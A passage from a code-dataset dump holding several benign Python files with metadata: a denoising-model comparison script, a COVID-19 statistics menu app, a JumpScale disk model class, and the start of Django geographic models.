ttools.get_logger('matplotlib.font_manager').disabled = True
#'ksize': 21, 'gather': False, 'pixel': False
def main(args):
    """Compare two denoising models on the same frames and visualize results.

    Loads a RecurrentMultisteps model (``--model1``) and a Multisteps model
    (``--model2``), denoises ``args.amount`` frames from ``args.data``, logs
    per-frame RMSE against the ground truth, saves labelled comparison images
    to ``args.save_dir``, and shows matplotlib grids of the outputs and of
    their frame-to-frame differences.

    :param args: argparse.Namespace with model1, model2, save_dir, data,
        amount and spp attributes (see the CLI definition at module bottom).
    :raises ValueError: if ``args.data`` does not exist.
    """
    if not os.path.exists(args.data):
        raise ValueError("input {} does not exist".format(args.data))
    # Load the data
    data_params = dict(spp=args.spp)
    data = sbmc.FullImagesDataset(args.data, **data_params)
    dataloader = DataLoader(data, batch_size=1, shuffle=False, num_workers=0)
    # Load the two models (on CPU first; moved to the GPU below if available)
    temp = th.load(f"{args.model1}", map_location=th.device('cpu'))
    model_one = sbmc.RecurrentMultisteps(data.num_features, data.num_global_features)
    try:  # Depending on the way a model is saved, the statedict is referenced with different keys
        model_one.load_state_dict(temp['model'])
    except:  # NOTE(review): bare except also hides unrelated errors; `except KeyError` would be safer
        model_one.load_state_dict(temp['model_state_dict'])
    model_one.train(False)
    temp = th.load(f"{args.model2}", map_location=th.device('cpu'))
    model_two = sbmc.Multisteps(data.num_features, data.num_global_features)
    try:  # Depending on the way a model is saved, the statedict is referenced with different keys
        model_two.load_state_dict(temp['model'])
    except:  # NOTE(review): bare except also hides unrelated errors; `except KeyError` would be safer
        model_two.load_state_dict(temp['model_state_dict'])
    model_two.train(False)
    device = "cuda" if th.cuda.is_available() else "cpu"
    if (device == "cuda"):
        LOG.info("Using CUDA")
        model_one.cuda()
        model_two.cuda()
    rmse_checker = losses.RelativeMSE()
    rmse_checker.to(device)
    # start = np.random.randint(0, 80) * 5
    start = 0
    model_one_outputs = []
    model_two_outputs = []
    ground_thruths = []
    for batch_idx, batch in enumerate(dataloader):
        # Denoise only frames in [start, start + args.amount).
        if batch_idx < start:
            continue
        if batch_idx >= start + args.amount:
            break
        for k in batch.keys():
            if not batch[k].__class__ == th.Tensor:
                continue
            batch[k] = batch[k].to(device)  # Sets the tensors to the correct device type
        # Compute the radiances using the two models
        with th.no_grad():
            output1 = model_one(batch)["radiance"]
            output2 = model_two(batch)["radiance"]
            model_one_outputs.append(output1)
            model_two_outputs.append(output2)
        # Get the input image and ground truth for comparison
        tgt = crop_like(batch["target_image"], output1)
        ground_thruths.append(tgt)
        low_spp = crop_like(batch["low_spp"], output1)
        # Compare to ground truth
        with th.no_grad():
            rmse1 = rmse_checker(output1, tgt)
            rmse2 = rmse_checker(output2, tgt)
        LOG.info(f"Model 1 denoised with rmse: {rmse1} || Model 2 denoised with rmse: {rmse2}")
        if rmse2 < rmse1:
            LOG.info("Model 2 outperformed model 1")
        else:
            LOG.info("Model 1 outperformed model 2")
        save_img(output1, output2, low_spp, tgt, args.save_dir, str(batch_idx))
    # Display denoising quality: one row per source (model 1, model 2, target)
    data_to_show = [model_one_outputs, model_two_outputs, ground_thruths]
    fig, axeslist = plt.subplots(ncols=len(model_one_outputs), nrows=len(data_to_show))
    plot_data = []
    for i, data in enumerate(data_to_show):
        for idx, img in enumerate(data):
            rmse = rmse_checker(img, ground_thruths[idx]).item()
            res = process_radiance(img)
            plot_data.append({'img': res, 'rmse': rmse})
    # Create image matrix; each tile is titled with its RMSE vs ground truth
    for ind, data in enumerate(plot_data):
        axeslist.ravel()[ind].imshow(data['img'])
        axeslist.ravel()[ind].set_title(str(round(data['rmse'], 5)))
        axeslist.ravel()[ind].set_axis_off()
    plt.tight_layout()  # optional
    plt.show()
    # Show frame-to-frame differences (temporal stability of each source)
    diff_array = []
    fig, axeslist = plt.subplots(ncols=len(model_one_outputs), nrows=3)
    rmse_data = defaultdict(list)
    data_to_show = [model_one_outputs, model_two_outputs, ground_thruths]
    for i, data in enumerate(data_to_show):
        for idx, img in enumerate(data):
            if idx > 0:
                diff = (img - data[idx-1]).abs()
                rmse = rmse_checker(img, data[idx-1]).item()
                rmse_data[str(i)].append(rmse)
            else:
                # First frame has no predecessor; show an all-zero diff.
                diff = th.zeros_like(tgt)
                rmse = 0
            res = process_radiance(diff)
            diff_array.append({'img': res, 'rmse': rmse})
    # Create image matrix
    for ind, data in enumerate(diff_array):
        axeslist.ravel()[ind].imshow(data['img'])
        axeslist.ravel()[ind].set_title(str(round(data['rmse'], 5)))
        axeslist.ravel()[ind].set_axis_off()
    plt.tight_layout()  # optional
    plt.show()
    # save_compare_frame(output1, output2, tgt)
    # make_compare_video(args.save_dir)
def process_radiance(data):
    """Tone-map a radiance tensor into a displayable HWC numpy image.

    Applies a Reinhard-style operator (x / (1 + x)) followed by gamma
    correction (exponent 1/2.2), clamps to [0, 1], and converts the first
    batch element from CHW torch layout to a contiguous HWC numpy array.
    """
    clamped = th.clamp(data, 0)
    tone_mapped = clamped / (1 + clamped)
    gamma_corrected = th.pow(tone_mapped, 1.0 / 2.2)
    displayable = th.clamp(gamma_corrected, 0, 1)
    image = displayable[0, ...].detach().cpu().numpy().transpose([1, 2, 0])
    return np.ascontiguousarray(image)
# Accumulated comparison frames (BGR uint8 arrays) consumed by make_compare_video().
frames = []


def save_compare_frame(radiance1, radiance2, tgt):
    """Append one comparison frame to the module-level ``frames`` list.

    Layout is a 2x2 grid: model 1 output | its abs diff with target on the
    top row, model 2 output | its abs diff with target on the bottom row.
    """
    # Difference between models and ground truth
    diff_model1 = (radiance1 - tgt).abs()
    diff_model2 = (radiance2 - tgt).abs()
    first_row = th.cat([radiance1, diff_model1], -1)
    second_row = th.cat([radiance2, diff_model2], -1)
    data = th.cat([first_row, second_row], -2)
    # Tone-map (Reinhard + gamma 1/2.2) into displayable [0, 1] range.
    data = th.clamp(data, 0)
    data /= 1 + data
    data = th.pow(data, 1.0/2.2)
    data = th.clamp(data, 0, 1)
    data = data[0, ...].cpu().detach().numpy().transpose([1, 2, 0])
    # Clip to 0-255 to remove HDR and pure radiance estimates + change to BGR color spectrum for opencv
    frames.append(cv2.cvtColor((np.clip(data, 0, 1)*255).astype(np.uint8), cv2.COLOR_RGB2BGR))
def make_compare_video(location):
    """Write the accumulated ``frames`` to <location>/compare_video.mp4 at 5 fps.

    Assumes save_compare_frame() has been called at least once (frames[0]
    is read unconditionally).
    """
    height, width, layers = frames[0].shape
    # Write to video
    out = cv2.VideoWriter(f'{location}/compare_video.mp4', cv2.VideoWriter_fourcc(*'mp4v'), 5, (width, height))
    # Play the sequence 10 times, reversing direction each pass (ping-pong loop).
    for _ in range(10):
        for i in range(len(frames)):
            out.write(frames[i])
        frames.reverse()
    out.release()
def save_img(radiance1, radiance2, low_radiance, tgt, checkpoint_dir, name):
    """Save a labelled comparison grid of both model outputs as EXR and PNG.

    Grid rows (top to bottom): low-spp input, model 1 output (+ abs diff
    with target), model 2 output (+ abs diff with target), target. Writes
    <checkpoint_dir>/<name>.exr (HDR) and <checkpoint_dir>/<name>.png.

    :param radiance1: model 1 radiance tensor, assumed (1, C, H, W) — TODO confirm.
    :param radiance2: model 2 radiance tensor, same shape as radiance1.
    :param low_radiance: low sample-count input radiance.
    :param tgt: ground-truth radiance.
    :param checkpoint_dir: output directory (created if missing).
    :param name: basename for the output files.
    """
    tmp_empty = th.zeros_like(radiance1)  # Empty filler tensor

    # Difference between models and ground truth
    diff_model1 = (radiance1 - tgt).abs()
    diff_model2 = (radiance2 - tgt).abs()

    # Create output data in the form:
    # low spp input --
    # output model1 -- Diff with tgt
    # output model2 -- Diff with tgt
    # tgt --
    first_row = th.cat([tmp_empty, low_radiance, tmp_empty], -1)
    second_row = th.cat([tmp_empty, radiance1, diff_model1], -1)
    third_row = th.cat([tmp_empty, radiance2, diff_model2], -1)
    fourth_row = th.cat([tmp_empty, tgt, tmp_empty], -1)

    # Concatenate the rows in a vertical stack and tone-map for display.
    data = th.cat([first_row, second_row, third_row, fourth_row], -2)
    data = th.clamp(data, 0)
    data /= 1 + data
    data = th.pow(data, 1.0/2.2)
    data = th.clamp(data, 0, 1)
    data = data[0, ...].cpu().detach().numpy().transpose([1, 2, 0])
    data = np.ascontiguousarray(data)

    # Add one text label per grid row.
    jump = radiance1.size()[2]
    font = cv2.FONT_HERSHEY_SIMPLEX
    cv2.putText(data, '4spp', (10, jump * 0 + 50), font, 0.5, (255, 255, 255), 1, cv2.LINE_AA)
    cv2.putText(data, 'Model 1', (10, jump * 1 + 50), font, 0.5, (255, 255, 255), 1, cv2.LINE_AA)
    cv2.putText(data, 'Model 2', (10, jump * 2 + 50), font, 0.5, (255, 255, 255), 1, cv2.LINE_AA)
    cv2.putText(data, 'Target', (10, jump * 3 + 50), font, 0.5, (255, 255, 255), 1, cv2.LINE_AA)

    os.makedirs(checkpoint_dir, exist_ok=True)
    # BUG FIX: the EXR output was previously named '<name>.png', so the
    # '.exr' -> '.png' substitution below was a no-op and the subsequent PNG
    # write clobbered the EXR data. Name the HDR file '<name>.exr' instead.
    outputfile = os.path.join(checkpoint_dir, f'{name}.exr')
    pyexr.write(outputfile, data)
    png = outputfile.replace(".exr", ".png")
    skio.imsave(png, (np.clip(data, 0, 1)*255).astype(np.uint8))
def load_model(model, load_path):
    """Restore a model's weights from a checkpoint file.

    :param model: module whose state dict will be overwritten in place.
    :param load_path: path to a checkpoint holding 'model_state_dict' and
        'epoch' entries.
    :return: (model, epoch) tuple.
    """
    snapshot = th.load(load_path)
    model.load_state_dict(snapshot['model_state_dict'])
    return model, snapshot['epoch']
if __name__ == "__main__":
    # CLI entry point: parse arguments, enable ttools logging, run comparison.
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--model1', required=True, help="path to the first model")
    parser.add_argument(
        '--model2', required=True, help="path to the second model")
    parser.add_argument(
        '--save_dir', required=True, help="path to the dir where everything has to be saved")
    parser.add_argument(
        '--data', required=True, help="path to the training data.")
    parser.add_argument(
        '--amount', required=False, type=int, default=1, help="Amount of frames to denoise and compare")
    parser.add_argument('--spp', type=int,
                        help="number of samples to use as input.")
    args = parser.parse_args()
    ttools.set_logger(True)
    main(args)
|
en
| 0.746113
|
#'ksize': 21, 'gather': False, 'pixel': False # Load the data # Load the two models # Depending on the way a model is saved, the statedict is referenced with different keys # Depending on the way a model is saved, the statedict is referenced with different keys # start = np.random.randint(0, 80) * 5 # Sets the tensors to the correct device type # Compute the radiances using the two models # Get the input image and ground thruth for comparison # Compare to ground thruth #Display Denoising quality # Create image matrix # optional # Show differences # Create image matrix # optional # save_compare_frame(output1, output2, tgt) # make_compare_video(args.save_dir) # Difference between models and ground thruth # Clip to 0-255 to remove HDR and pure radiance estimates + change to BGR color spectrum for opencv # Write to video # Stitch 5 times to create loop # Empty filler tensor # Difference between models and ground thruth # Create output data in the form: # low spp input -- # ouput model1 -- Diff with tgt # ouput model2 -- Diff with tgt # tgt -- # Concate the data in a vertical stack # Add text to the images
| 1.971375
| 2
|
app.py
|
arjundha/COMP1510-Hackathon
| 0
|
6627637
|
"""
Main application file
"""
import market_data
import covid19_stats
import news
import user_generation
import funding
import dow_plot
import doctest
def option_menu() -> int:
    """
    Ask user to choose option.
    :precondition: input must be a number that corresponds with an option
    :postcondition: will return the user's choice as an int
    :return: input as an int
    """
    while True:
        print("Please select an option from the following menu.")
        try:
            # int() raises ValueError for non-numeric input, which re-prompts.
            return int(input("""
1. Global Statistics
2. Information about my Country
3. Search by Country
4. News Articles
5. Search Stocks
6. Am I Eligible for the Canadian Emergency Response Benefit Funding?
7. Show effect of COVID-19 on DOW Jones Index
8. Quit
\n""").strip())
        except ValueError:
            print("Please input a number that corresponds to an option on the menu.")
def menu_handler(user_input: int, user: object or str) -> object:
    """
    Run and return the function that corresponds to user_input.
    :param user_input: a user entered integer menu choice (1-8)
    :param user: a well formed user object created in user_generation
    :precondition: user_input must be an integer that corresponds with an option
    :postcondition: will return the result of the function for the desired option
    :raise: TypeError if user_input does not correspond with an option
    :return: the result of the function that corresponds with user_input
    """
    if user_input == 1:
        return global_statistics()
    if user_input == 2:
        return my_country(user)
    if user_input == 3:
        return country_search()
    if user_input == 4:
        return get_news()
    if user_input == 5:
        # BUG FIX: the call was previously not returned, so control fell
        # through to `raise TypeError` and options 5 and 7 always reported
        # an invalid input even after running successfully.
        return search_stocks()
    if user_input == 6:
        return verify_canadian_funding(user)
    if user_input == 7:
        return show_dow_chart()  # BUG FIX: same fall-through as option 5.
    if user_input == 8:
        print("Have a nice day, and remember to wash your hands!")
        quit()
    # Any other value is not a menu option; main() catches this and re-prompts.
    raise TypeError
def search_stocks():
    """Prompt the user for a stock and display its market information.

    :postcondition: delegates entirely to market_data.ask_for_stock()
    """
    market_data.ask_for_stock()
def show_dow_chart():
    """Render the DOW Jones chart.

    :postcondition: delegates entirely to dow_plot.main()
    """
    dow_plot.main()
def verify_canadian_funding(user: object):
    """Check Canadian Emergency Response Benefit (CERB) eligibility.

    :param user: a well-formed User object
    :postcondition: delegates the eligibility check to funding.verify_for_funding
    """
    funding.verify_for_funding(user)
def my_country(user: object or str):
    """Show COVID-19 statistics for the user's own country.

    :param user: a well formed user object created in user_generation
    :postcondition: prints the country name followed by its statistics
    """
    print(user.get_country())
    stats = covid19_stats.get_country_stats(user.get_country())
    display_statistics(stats)
def get_news():
    """Show the interactive news-article menu.

    :postcondition: delegates to news.display_news_articles_menu()
    """
    news.display_news_articles_menu()
def country_search():
    """Prompt for a country name and display its COVID-19 statistics.

    :precondition: input must name a country the COVID-19 API recognizes
    :postcondition: prints the statistics, or a help message for bad input
    :except: StopIteration raised by the stats lookup for unknown countries
    """
    country = input("Please input country\n").strip()
    try:
        stats = covid19_stats.get_country_stats(country)
    except StopIteration:
        # Unknown country: tell the user how to spell names the API accepts.
        print("Sorry, Your input is not a valid country\n")
        print("Try typing the full name of the country. Ex: United States -> United States of America")
    else:
        print(country.capitalize())
        display_statistics(stats)
def global_statistics():
    """Fetch and display worldwide COVID-19 statistics.

    :postcondition: prints the aggregate statistics under the API's
        'Global' key
    """
    world_totals = covid19_stats.global_stats()['Global']
    display_statistics(world_totals)
def display_statistics(statistics: dict or str):
    """
    Display statistics from given dictionary.
    :param statistics: covid19 dictionary
    :preconditions: statistics must be a well formatted covid19 API dictionary
    :postconditions: Will display detailed statistics from the specified dictionary
    """
    # Active cases are derived: confirmed minus deaths minus recovered.
    print(f"""
Total Active Cases: {statistics["TotalConfirmed"] - statistics["TotalDeaths"] - statistics["TotalRecovered"]}
New Confirmed Cases: {statistics["NewConfirmed"]}
Total Confirmed: {statistics["TotalConfirmed"]}
New Deaths: {statistics["NewDeaths"]}
Total Deaths: {statistics["TotalDeaths"]}
Newly Recovered: {statistics["NewRecovered"]}
Total Recovered: {statistics["TotalRecovered"]}
\n""")
    # Pause so the user can read the output before the menu reappears.
    input("Hit enter to continue")
def main():
    """
    Run program: build a user profile, then loop on the menu until quit.
    """
    doctest.testmod()
    # Welcome message
    print("Welcome to the COVID-19 App! Before we get started, lets generate your user profile.")
    # Create user
    user = user_generation.create_user()
    # Check if user information is correct
    user_generation.check_if_user_information_is_correct(user)
    while True:
        user_choice = option_menu()
        try:
            menu_handler(user_choice, user)
        except TypeError:
            # menu_handler raises TypeError for unknown options; re-prompt.
            print("Your input was invalid or not an option, try again")


if __name__ == '__main__':
    main()
|
"""
Main application file
"""
import market_data
import covid19_stats
import news
import user_generation
import funding
import dow_plot
import doctest
def option_menu() -> int:
    """
    Ask user to choose option.
    :precondition: input must be a number that corresponds with an option
    :postcondition: will return the user's choice as an int
    :return: input as an int
    """
    while True:
        print("Please select an option from the following menu.")
        try:
            # int() raises ValueError for non-numeric input, which re-prompts.
            return int(input("""
1. Global Statistics
2. Information about my Country
3. Search by Country
4. News Articles
5. Search Stocks
6. Am I Eligible for the Canadian Emergency Response Benefit Funding?
7. Show effect of COVID-19 on DOW Jones Index
8. Quit
\n""").strip())
        except ValueError:
            print("Please input a number that corresponds to an option on the menu.")
def menu_handler(user_input: int, user: object or str) -> object:
    """
    Run and return the function that corresponds to user_input.
    :param user_input: a user entered integer menu choice (1-8)
    :param user: a well formed user object created in user_generation
    :precondition: user_input must be an integer that corresponds with an option
    :postcondition: will return the result of the function for the desired option
    :raise: TypeError if user_input does not correspond with an option
    :return: the result of the function that corresponds with user_input
    """
    if user_input == 1:
        return global_statistics()
    if user_input == 2:
        return my_country(user)
    if user_input == 3:
        return country_search()
    if user_input == 4:
        return get_news()
    if user_input == 5:
        # BUG FIX: the call was previously not returned, so control fell
        # through to `raise TypeError` and options 5 and 7 always reported
        # an invalid input even after running successfully.
        return search_stocks()
    if user_input == 6:
        return verify_canadian_funding(user)
    if user_input == 7:
        return show_dow_chart()  # BUG FIX: same fall-through as option 5.
    if user_input == 8:
        print("Have a nice day, and remember to wash your hands!")
        quit()
    # Any other value is not a menu option; main() catches this and re-prompts.
    raise TypeError
def search_stocks():
    """Prompt the user for a stock and display its market information.

    :postcondition: delegates entirely to market_data.ask_for_stock()
    """
    market_data.ask_for_stock()
def show_dow_chart():
    """Render the DOW Jones chart.

    :postcondition: delegates entirely to dow_plot.main()
    """
    dow_plot.main()
def verify_canadian_funding(user: object):
    """Check Canadian Emergency Response Benefit (CERB) eligibility.

    :param user: a well-formed User object
    :postcondition: delegates the eligibility check to funding.verify_for_funding
    """
    funding.verify_for_funding(user)
def my_country(user: object or str):
    """Show COVID-19 statistics for the user's own country.

    :param user: a well formed user object created in user_generation
    :postcondition: prints the country name followed by its statistics
    """
    print(user.get_country())
    stats = covid19_stats.get_country_stats(user.get_country())
    display_statistics(stats)
def get_news():
    """Show the interactive news-article menu.

    :postcondition: delegates to news.display_news_articles_menu()
    """
    news.display_news_articles_menu()
def country_search():
    """Prompt for a country name and display its COVID-19 statistics.

    :precondition: input must name a country the COVID-19 API recognizes
    :postcondition: prints the statistics, or a help message for bad input
    :except: StopIteration raised by the stats lookup for unknown countries
    """
    country = input("Please input country\n").strip()
    try:
        stats = covid19_stats.get_country_stats(country)
    except StopIteration:
        # Unknown country: tell the user how to spell names the API accepts.
        print("Sorry, Your input is not a valid country\n")
        print("Try typing the full name of the country. Ex: United States -> United States of America")
    else:
        print(country.capitalize())
        display_statistics(stats)
def global_statistics():
    """Fetch and display worldwide COVID-19 statistics.

    :postcondition: prints the aggregate statistics under the API's
        'Global' key
    """
    world_totals = covid19_stats.global_stats()['Global']
    display_statistics(world_totals)
def display_statistics(statistics: dict or str):
    """
    Display statistics from given dictionary.
    :param statistics: covid19 dictionary
    :preconditions: statistics must be a well formatted covid19 API dictionary
    :postconditions: Will display detailed statistics from the specified dictionary
    """
    # Active cases are derived: confirmed minus deaths minus recovered.
    print(f"""
Total Active Cases: {statistics["TotalConfirmed"] - statistics["TotalDeaths"] - statistics["TotalRecovered"]}
New Confirmed Cases: {statistics["NewConfirmed"]}
Total Confirmed: {statistics["TotalConfirmed"]}
New Deaths: {statistics["NewDeaths"]}
Total Deaths: {statistics["TotalDeaths"]}
Newly Recovered: {statistics["NewRecovered"]}
Total Recovered: {statistics["TotalRecovered"]}
\n""")
    # Pause so the user can read the output before the menu reappears.
    input("Hit enter to continue")
def main():
    """
    Run program: build a user profile, then loop on the menu until quit.
    """
    doctest.testmod()
    # Welcome message
    print("Welcome to the COVID-19 App! Before we get started, lets generate your user profile.")
    # Create user
    user = user_generation.create_user()
    # Check if user information is correct
    user_generation.check_if_user_information_is_correct(user)
    while True:
        user_choice = option_menu()
        try:
            menu_handler(user_choice, user)
        except TypeError:
            # menu_handler raises TypeError for unknown options; re-prompt.
            print("Your input was invalid or not an option, try again")


if __name__ == '__main__':
    main()
|
en
| 0.715568
|
Main application file Ask user to choose option. :precondition: input must be a number that corresponds with an option :postcondition: will return the user's choice as an int :return: input as an int 1. Global Statistics 2. Information about my Country 3. Search by Country 4. News Articles 5. Search Stocks 6. Am I Eligible for the Canadian Emergency Response Benefit Funding? 7. Show effect of COVID-19 on DOW Jones Index 8. Quit \n Return function that corresponds you user_input. :param user_input: a user entered integer :param user: a well formed user object :precondition: user_input must be an integer that corresponds with an option :precondition: user must be an object created in user_generation :postcondition: will return the function that corresponds with desired option :raise: TypeError if user_input does not correspond with and option :return: a function that corresponds with user_input # Return the corresponding function Ask user for stock :postcondition: will run ask_for_stock() and ask user for a stock and then display the information Display DOW JONES chart. :postcondition: will run the main function in dow_plot file Verify if user is eligible for Canadian Emergency Response Benefit funding. :param user: User object :precondition: user_object must be a well-formed User object :postcondition: Successfully verify if user is eligible for Canadian Emergency Response Benefit funding Display statistics from user country. :param user: a well formed user object :precondition: user must be an object created in user_generation :postcondition: will display all information regarding the user's inputted location # Display country # Get Country stats by passing it to get_country_stats Display news article interface :postcondition: will run the news article function get_default_country_top_headlines() from news Search country specific statistics. 
:precondition: country input must be a valid country :postcondition: will display the information regarding the entered country :except: StopIteration if input is not a valid country # Ask user for input # Check if input meets conditions # Display information Display the global COVID-19 statistics. :postcondition: will display all statistics for the world # Get the dictionary from from the api # Specify the key # Display the information Display statistics from given dictionary. :param statistics: covid19 dictionary :preconditions: statistics must be a well formatted covid19 API dictionary :postconditions: Will display details statistics regarding the specified dictionary Total Active Cases: {statistics["TotalConfirmed"] - statistics["TotalDeaths"] - statistics["TotalRecovered"]} New Confirmed Cases: {statistics["NewConfirmed"]} Total Confirmed: {statistics["TotalConfirmed"]} New Deaths: {statistics["NewDeaths"]} Total Deaths: {statistics["TotalDeaths"]} Newly Recovered: {statistics["NewRecovered"]} Total Recovered: {statistics["TotalRecovered"]} \n Run program. # Welcome message # Create user # Check if user information is correct
| 3.844191
| 4
|
apps/osis/logic/system/disk/system_disk_osismodelbase.py
|
rudecs/jumpscale_core7
| 0
|
6627638
|
<reponame>rudecs/jumpscale_core7
from JumpScale import j
class system_disk_osismodelbase(j.code.classGetJSRootModelBase()):
    """OSIS base model for a disk (spec: system/model.spec, model "disk").

    Every spec field is exposed as a property backed by a ``_P_<name>``
    attribute.  Each setter accepts ``None``, a value already of the target
    type, or a string that ``j.basetype`` can parse into the target type;
    anything else raises ``TypeError`` with the message the generated
    boilerplate used.  This rewrite collapses 18 byte-identical
    getter/setter/deleter triples into one property factory and removes a
    dead ``pass`` plus a redundant ``_P__meta`` default from ``__init__``.
    """

    def __init__(self):
        # Defaults go straight to the backing attributes, bypassing the
        # property setters (no validation needed for known-good defaults).
        self._P_id = 0
        self._P_partnr = 0
        self._P_gid = 0
        self._P_nid = 0
        self._P_path = ""
        self._P_size = 0
        self._P_free = 0
        self._P_ssd = 0
        self._P_fs = ""
        self._P_mounted = True
        self._P_mountpoint = ""
        self._P_active = True
        self._P_model = ""
        self._P_description = ""
        self._P_type = list()
        self._P_lastcheck = ""
        self._P_guid = ""
        # @todo version not implemented now, just already foreseen
        self._P__meta = ["osismodel", "system", "disk", 1]

    def _checked_property(fieldname, pytype, basetype_name):
        """Build a validated property for *fieldname*.

        *pytype* is the accepted Python type; *basetype_name* selects the
        ``j.basetype`` helper used to parse string input.  Called during
        class-body execution and deleted afterwards, so it is not part of
        the public interface.
        """
        attr = "_P_" + fieldname

        def _get(self):
            return getattr(self, attr)

        def _set(self, value):
            if not isinstance(value, pytype) and value is not None:
                caster = getattr(j.basetype, basetype_name)
                if isinstance(value, basestring) and caster.checkString(value):
                    value = caster.fromString(value)
                else:
                    # Message kept byte-identical to the generated original.
                    raise TypeError(
                        "property %s input error, needs to be %s, specfile: "
                        "/opt/jumpscale7/apps/osis/logic/system/model.spec, "
                        "name model: disk, value was:" % (fieldname, pytype.__name__)
                        + str(value))
            setattr(self, attr, value)

        def _del(self):
            delattr(self, attr)

        return property(_get, _set, _del)

    # One property per spec field; replaces the repeated boilerplate.
    id = _checked_property("id", int, "integer")
    partnr = _checked_property("partnr", int, "integer")
    gid = _checked_property("gid", int, "integer")
    nid = _checked_property("nid", int, "integer")
    path = _checked_property("path", str, "string")
    size = _checked_property("size", int, "integer")
    free = _checked_property("free", int, "integer")
    ssd = _checked_property("ssd", int, "integer")
    fs = _checked_property("fs", str, "string")
    mounted = _checked_property("mounted", bool, "boolean")
    mountpoint = _checked_property("mountpoint", str, "string")
    active = _checked_property("active", bool, "boolean")
    model = _checked_property("model", str, "string")
    description = _checked_property("description", str, "string")
    type = _checked_property("type", list, "list")
    lastcheck = _checked_property("lastcheck", str, "string")
    guid = _checked_property("guid", str, "string")
    _meta = _checked_property("_meta", list, "list")

    del _checked_property  # keep the class namespace identical to the original
|
from JumpScale import j
class system_disk_osismodelbase(j.code.classGetJSRootModelBase()):
    """OSIS base model for a disk (spec: system/model.spec, model "disk").

    Every spec field is exposed as a property backed by a ``_P_<name>``
    attribute.  Each setter accepts ``None``, a value already of the target
    type, or a string that ``j.basetype`` can parse into the target type;
    anything else raises ``TypeError`` with the message the generated
    boilerplate used.  This rewrite collapses 18 byte-identical
    getter/setter/deleter triples into one property factory and removes a
    dead ``pass`` plus a redundant ``_P__meta`` default from ``__init__``.
    """

    def __init__(self):
        # Defaults go straight to the backing attributes, bypassing the
        # property setters (no validation needed for known-good defaults).
        self._P_id = 0
        self._P_partnr = 0
        self._P_gid = 0
        self._P_nid = 0
        self._P_path = ""
        self._P_size = 0
        self._P_free = 0
        self._P_ssd = 0
        self._P_fs = ""
        self._P_mounted = True
        self._P_mountpoint = ""
        self._P_active = True
        self._P_model = ""
        self._P_description = ""
        self._P_type = list()
        self._P_lastcheck = ""
        self._P_guid = ""
        # @todo version not implemented now, just already foreseen
        self._P__meta = ["osismodel", "system", "disk", 1]

    def _checked_property(fieldname, pytype, basetype_name):
        """Build a validated property for *fieldname*.

        *pytype* is the accepted Python type; *basetype_name* selects the
        ``j.basetype`` helper used to parse string input.  Called during
        class-body execution and deleted afterwards, so it is not part of
        the public interface.
        """
        attr = "_P_" + fieldname

        def _get(self):
            return getattr(self, attr)

        def _set(self, value):
            if not isinstance(value, pytype) and value is not None:
                caster = getattr(j.basetype, basetype_name)
                if isinstance(value, basestring) and caster.checkString(value):
                    value = caster.fromString(value)
                else:
                    # Message kept byte-identical to the generated original.
                    raise TypeError(
                        "property %s input error, needs to be %s, specfile: "
                        "/opt/jumpscale7/apps/osis/logic/system/model.spec, "
                        "name model: disk, value was:" % (fieldname, pytype.__name__)
                        + str(value))
            setattr(self, attr, value)

        def _del(self):
            delattr(self, attr)

        return property(_get, _set, _del)

    # One property per spec field; replaces the repeated boilerplate.
    id = _checked_property("id", int, "integer")
    partnr = _checked_property("partnr", int, "integer")
    gid = _checked_property("gid", int, "integer")
    nid = _checked_property("nid", int, "integer")
    path = _checked_property("path", str, "string")
    size = _checked_property("size", int, "integer")
    free = _checked_property("free", int, "integer")
    ssd = _checked_property("ssd", int, "integer")
    fs = _checked_property("fs", str, "string")
    mounted = _checked_property("mounted", bool, "boolean")
    mountpoint = _checked_property("mountpoint", str, "string")
    active = _checked_property("active", bool, "boolean")
    model = _checked_property("model", str, "string")
    description = _checked_property("description", str, "string")
    type = _checked_property("type", list, "list")
    lastcheck = _checked_property("lastcheck", str, "string")
    guid = _checked_property("guid", str, "string")
    _meta = _checked_property("_meta", list, "list")

    del _checked_property  # keep the class namespace identical to the original
|
en
| 0.745183
|
#@todo version not implemented now, just already foreseen
| 2.052455
| 2
|
serpantin/apps/common/models.py
|
ainomugish/serpantin
| 0
|
6627639
|
<reponame>ainomugish/serpantin
#
#
#
from string import find
from django.db import models
#from django.core import validators
#from django.core.validators import isValidEmail
from django.utils.translation import gettext_lazy as _
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.contrib import admin
from django.contrib.auth.models import User
from serpantin.dojoforms import *
class Country(models.Model):
    """A country; top of the Country > Region > District > Town hierarchy."""
    #addr_code = models.CharField(_('Street Code'), max_length=6)
    name = models.CharField(_('Country Name'), max_length=100)
    # Audit trail: who created/last modified the row and when.
    createuser = models.ForeignKey(User, related_name='created_countries', blank=True, null=True)
    createdate = models.DateTimeField(blank=True, auto_now_add=True)
    modifyuser = models.ForeignKey(User, related_name='modified_countries', blank=True, null=True)
    modifydate = models.DateTimeField(blank=True, auto_now=True)
    class Meta:
        verbose_name = _('Country')
        verbose_name_plural = _('Countries')
        ordering = ('name',)
    class Admin:  # old-style (pre-1.0 Django) admin declaration
        fields = (
            (None, {'fields': ('name',)}),
        )
        list_display = ('name',)
    def __unicode__(self):
        return self.name
class Region(models.Model):
    """An administrative region, optionally linked to a Country."""
    country = models.ForeignKey(Country, blank=True, null=True, verbose_name=_('Country'))
    #FIXME: shortname is too short
    #shortname = models.CharField(_('Region Code'), max_length=6, unique=True, blank=True)
    name = models.CharField(_('Region Name'), max_length=100, unique=True)
    # Audit trail.  NOTE(review): related_name 'modified_regionss' has a
    # double "s"; renaming would change the reverse accessor, so left as is.
    createuser = models.ForeignKey(User, related_name='created_regions', blank=True, null=True)
    createdate = models.DateTimeField(blank=True, auto_now_add=True)
    modifyuser = models.ForeignKey(User, related_name='modified_regionss', blank=True, null=True)
    modifydate = models.DateTimeField(blank=True, auto_now=True)
    class Meta:
        verbose_name = _('Region')
        verbose_name_plural = _('Regions')
    class Admin:  # old-style (pre-1.0 Django) admin declaration
        fields = (
            (None, {'fields': ('name',)}),
        )
        list_display = ('name',)
    def __unicode__(self):
        return self.name
class District(models.Model):
    """A district inside a Region; (name, region) pairs are unique."""
    name = models.CharField(_('District Name'), max_length=60, blank=True)
    region = models.ForeignKey(Region, verbose_name=_('Region Name'), blank=True, null=True)
    # Audit trail.
    createuser = models.ForeignKey(User, related_name='created_districts', blank=True, null=True)
    createdate = models.DateTimeField(blank=True, auto_now_add=True)
    modifyuser = models.ForeignKey(User, related_name='modified_districts', blank=True, null=True)
    modifydate = models.DateTimeField(blank=True, auto_now=True)
    class Meta:
        verbose_name = _('District')
